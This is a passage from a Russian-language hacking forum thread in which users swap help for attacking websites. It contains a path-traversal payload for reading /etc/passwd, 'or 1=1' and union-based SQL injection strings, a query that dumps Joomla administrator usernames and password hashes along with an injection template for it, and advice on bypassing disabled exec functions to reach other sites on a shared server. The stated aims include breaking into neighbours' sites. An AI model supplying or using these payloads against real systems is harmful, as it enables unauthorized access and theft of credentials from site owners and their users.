Старый 19.10.2014, 18:20   #3311
Panic
 
Регистрация: 24.09.2010
Сообщений: 26
Репутация: 1
По умолчанию

omen666, нужно еще подловить момент, пока сессия активна, так?
Panic вне форума   Ответить с цитированием
Старый 19.10.2014, 19:00   #3312
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Цитата:
Сообщение от Panic Посмотреть сообщение
omen666, нужно еще подловить момент, пока сессия активна, так?
Да, лично я так заливался и ложил был на phpass
omen666 вне форума   Ответить с цитированием
Старый 27.10.2014, 21:55   #3313
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

ребят,есть такой файл:

PHP код:
<?php
$id 
$_GET['id'];
echo @
file_get_contents("/tmp/tg_l.$id");
?>
кроме читалки тут ничего нет?)
QaRTiN вне форума   Ответить с цитированием
Старый 28.10.2014, 13:26   #3314
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

Цитата:
Сообщение от QaRTiN Посмотреть сообщение
ребят,есть такой файл:

PHP код:
<?php
$id 
$_GET['id'];
echo @
file_get_contents("/tmp/tg_l.$id");
?>
кроме читалки тут ничего нет?)
да, только локальная читалка файлов.
Код:
1.php?id=../../../etc/passwd
faza02 вне форума   Ответить с цитированием
Старый 30.10.2014, 16:10   #3315
shosman
 
Регистрация: 24.07.2012
Сообщений: 7
Репутация: -2
По умолчанию

ok.
so i have this file, reset.php.
its a form to reset forgotten passwords.
there's a security question, and when i type 123, i get "wrong".
but when i type 'or 1=1-- -, i get redirected.
any ideas how to bypass that?
shosman вне форума   Ответить с цитированием
Старый 02.11.2014, 18:44   #3316
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Цитата:
Сообщение от shosman Посмотреть сообщение
ok.
so i have this file, reset.php.
its a form to reset forgotten passwords.
there's a security question, and when i type 123, i get "wrong".
but when i type 'or 1=1-- -, i get redirected.
any ideas how to bypass that?
Try to disable the redirect in your browser.

Disable automatic redirection in Opera
  • Open Opera
  • Click on Menu> Settings> Quick Preferences > Edit site preferences
  • Select the "Network" tab
  • Uncheck the "Enable automatic redirection" option
  • Click on Ok to validate

Последний раз редактировалось omen666; 02.11.2014 в 18:52..
omen666 вне форума   Ответить с цитированием
Старый 02.11.2014, 21:53   #3317
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

ребят,есть ли универсальная sql-иньекция для этих двух sql-запросов?

select id2 from schema.table where id=$id; -- для этой: 1 union all select version()#
select id3 from schema.table where (id=$id); -- для этой: 1) union all select version()#

нужна универсальная,т.к. результат выводиться только при успешном выполнении обоих
QaRTiN вне форума   Ответить с цитированием
Старый 04.11.2014, 14:55   #3318
b1ng0
 
Регистрация: 04.11.2014
Сообщений: 3
Репутация: 0
По умолчанию

Доброго времени суток, уважаемые, есть задача - пролезть к соседям на сервере.
Параметры сервера:
Server OS : FreeBSD 9.1-RELEASE-p20 FreeBSD 9.1-RELEASE-p20 #0: Mon Oct 20 20:19:33 UTC 2014 :/usr/obj/usr/src/sys/GENERIC amd64
PHP Version 5.3.29
User info : uid=30(www) gid=80(80)
OpenBaseDir : /home/********:/tmp:/usr/local/lib/php:/usr/local/php5
Disable functions : passthru, exec, system, popen, shell_exec, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate
Есть валидный ftp аккаунт.

Как видите многие функции запрещены, так же я пробовал выполнить команду через ftp_exec, но был послан лесом,
код (из примера на php.su):
Цитата:
$ftp_user_name = "********";
$ftp_user_pass = "********";
$command = 'ls -al >files.txt';
$conn_id = ftp_connect("127.0.0.1");
$login_result = ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
if (ftp_exec($conn_id, $command)) { echo "Команда $command выполнена успешно<br>\n"; }
else { echo 'Не удалось выполнить ' . $command;}
Подскажите, какие еще у меня есть варианты?
Спасибо.
b1ng0 вне форума   Ответить с цитированием
Старый 04.11.2014, 15:28   #3319
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Цитата:
Сообщение от b1ng0 Посмотреть сообщение
Доброго времени суток, уважаемые, есть задача - пролезть к соседям на сервере.
Параметры сервера:
Server OS : FreeBSD 9.1-RELEASE-p20 FreeBSD 9.1-RELEASE-p20 #0: Mon Oct 20 20:19:33 UTC 2014 :/usr/obj/usr/src/sys/GENERIC amd64
PHP Version 5.3.29
User info : uid=30(www) gid=80(80)
OpenBaseDir : /home/********:/tmp:/usr/local/lib/php:/usr/local/php5
Disable functions : passthru, exec, system, popen, shell_exec, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate
Есть валидный ftp аккаунт.

Как видите многие функции запрещены, так же я пробовал выполнить команду через ftp_exec, но был послан лесом,
код (из примера на php.su):


Подскажите, какие еще у меня есть варианты?
Спасибо.
Статья SSI от уважаемого Twost

Последний раз редактировалось omen666; 04.11.2014 в 15:39..
omen666 вне форума   Ответить с цитированием
Старый 04.11.2014, 15:34   #3320
omen666
 
Регистрация: 06.09.2014
Сообщений: 64
Репутация: 9
По умолчанию

Цитата:
Сообщение от Panic Посмотреть сообщение
Ravenous, там many to many:
Код:
SELECT concat_ws(0x3a,username,password)
FROM `j6iw1_user_usergroup_map` inner join `j6iw1_users` on `j6iw1_user_usergroup_map`.user_id=`j6iw1_users`.id
WHERE group_id in (6,7,8)
GROUP BY user_id;
где
6 - Manager;
7 - Administrator;
8 - Super Administrator;
Panic красава, прикольный join
Шаблон под SQL inj, если мы не знаем префикс будет выглядеть вот так:
from #__user_usergroup_map inner join #__users on #__user_usergroup_map.user_id=#__users.id WHERE group_id in (6,7,8)

Последний раз редактировалось omen666; 04.11.2014 в 15:38..
omen666 вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot